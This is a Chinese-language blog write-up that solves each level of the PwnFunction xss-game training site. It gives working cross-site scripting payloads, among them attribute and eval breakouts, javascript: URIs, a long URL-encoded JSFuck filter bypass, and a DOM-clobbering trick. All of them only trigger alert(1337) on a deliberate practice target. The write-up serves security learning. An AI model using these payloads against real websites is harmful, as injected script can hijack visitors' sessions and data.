XSS漏洞:xss-game

发布于:2025-03-22 ⋅ 阅读:(17) ⋅ 点赞:(0)

目录

Ma Spaghet!

Jefff

Ugandan Knuckles

Ricardo Milos

Ah That's Hawt

Ligma

Mafia

Ok, Boomer

靶场链接: XSS Game - Learning XSS Made Simple! | Created by PwnFunctionhttps://xss.pwnfunction.com/

Ma Spaghet!

somebody=<img%20src=1%20onerror=alert(1337)>

直接通过传参来实现。

Jefff

jeff=aaa";alert(1337)//
或者
jeff=aaa";alert(1337);"

eval(`ma = "Ma name ${jeff}"`)

利用这里的代码构造payload

jeff=aaa";alert(1337)//
jeff=aaa";alert(1337);"
​
eval(`ma = "Ma name =aaa";alert(1337)//"`)   利用//来注释“
eval(`ma = "Ma name =aaa";alert(1337);""`)   利用;"来闭合后面"

当然也可以利用如下方法,通过-来连接前后两个闭合引号

Ugandan Knuckles

很明显,代码中将<>给过滤了,那么可以利用

aaa" onclick="alert(1337)

但是这样做,违背了不能和用户交互的原则

那么可以用autofocus

wey=aaa" onfocus=alert(1337) autofocus="

Ricardo Milos

简单尝试 

紧接着跳转到

但是action中也可以执行javascript伪协议

?ricardo=javascript:alert(1337)

Ah That's Hawt

本关从代码上看,是将 ()`` 和` 这些字符替换为空字符串

那么尝试利用如下时()会被替换为空字符

<img src=1 onerror=alert%281337%29>

发现这样不行,那我们利用location来执行javascript

?markassbrownlee=<img src=1 onerror=location="javascript:alert%25281337%2529">

Ligma

本关过滤了A-Z a-z 0-9

那可以利用jsfuck将alert=(1337)转换为

然后将其进行url编码

即:

%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%2B%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%29

Mafia

第一次替换是将字符串中的反引号、单引号、双引号、加号、减号、感叹号、反斜杠、方括号替换为下划线,且不区分大小写;

第二次替换是将字符串中的 alert 替换为下划线。

但是没有过滤confirm和prompt

借助 Function 构造函数来创建一个新函数,接着立即调用这个新函数。

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

或者

eval(8680439..toString(30))(1337)

上图内容解释8680439的转换

或者

eval(location.hash.slice(1))#alert(1337)
1.location.hash
在 JavaScript 里,location 对象代表当前窗口所加载文档的 URL。location.hash 属性用于获取或设置 URL 中的锚点部分(即 # 及其后面的内容)。
例如,若当前页面的 URL 是 https://example.com/page.html#section1,那么 location.hash 的值就是 #section1。
2. location.hash.slice(1)
slice 是 JavaScript 字符串对象的一个方法,用于提取字符串的一部分并返回一个新字符串。location.hash.slice(1) 的作用是从 location.hash 字符串的第二个字符开始截取,也就是去掉开头的 # 符号。
比如,若 location.hash 为 #section1,那么 location.hash.slice(1) 的结果就是 section1。
3. eval(location.hash.slice(1))
eval 是 JavaScript 中的一个全局函数,它可以将传入的字符串作为 JavaScript 代码进行解析和执行。所以 eval(location.hash.slice(1)) 会把 URL 中锚点部分去掉 # 后的字符串当作 JavaScript 代码来执行。
4. #alert(1337)
在这个上下文中,# 后面的 alert(1337) 是 URL 中的锚点内容。当页面加载完成后,eval(location.hash.slice(1)) 会尝试执行 alert(1337) 这段代码,而 alert 是 JavaScript 中的一个函数,用于弹出一个包含指定消息的警告框,所以这里会弹出一个显示 1337 的警告框。

Ok, Boomer

1.首先什么是dom破坏

在HTML中,如果使用一些特定的属性名(id、name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。这种行为虽然有时可以方便地访问元素,但也会引发一些潜在的问题,特别是在元素的属性名与JavaScript全局对象的属性名冲突时,可能会破坏正常的DOM操作或脚本运行。这种现象被称为DOM破坏。

2.dom破坏的原理

当DOM元素拥有id或name属性时,浏览器会自动在全局作用域创建一个同名的属性,指向该DOM元素。比如<div id="ok">会创建一个window.ok属性,指向这个div元素。如果元素的id或name属性与已有的JavaScript全局对象或内置属性名冲突,会覆盖原有的JS代码。

举例:

<!DOCTYPE html>
<html lang="en">

<body>
    <form id="submit">
        <input type="text" name="username">
        <input type="submit" value="提交">
    </form>
    <script>
        // 原本 submit 是表单元素的一个方法
        // 但由于表单的 id 为 submit,window.submit 现在指向这个表单元素
        console.log(typeof submit); // 输出 'object',而不是 'function'
        // 尝试调用 submit 方法会出错
        // submit(); // 这会报错,因为 submit 现在是一个 DOM 元素,不是函数
    </script>
</body>

</html>

在这个例子中,<form>元素的idsubmit。在 JavaScript 中,submit通常是表单元素的一个方法,用于提交表单。但由于浏览器在全局作用域中创建了一个名为submit的属性,指向这个表单元素,导致原本的submit方法被覆盖。此时,submit变成了一个 DOM 元素,而不是一个函数,尝试调用它会引发错误。

该题中,通过构造与setTimeout函数参数名相同的标签id,浏览器执行setTimeout函数时会查找HTML中id=ok的字符串类型的标签,而<a>标签被调用时回一个表示<a>标签的字符串即href属性中的值,因此setTimeout函数执行时会将<a>标签中href属性的值tel:alert(1)当作代码来执行,利用该框架中白名单函数tel来执行。

即:

?boomer=<a%20id=ok%20href=tel:alert(1337)>

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布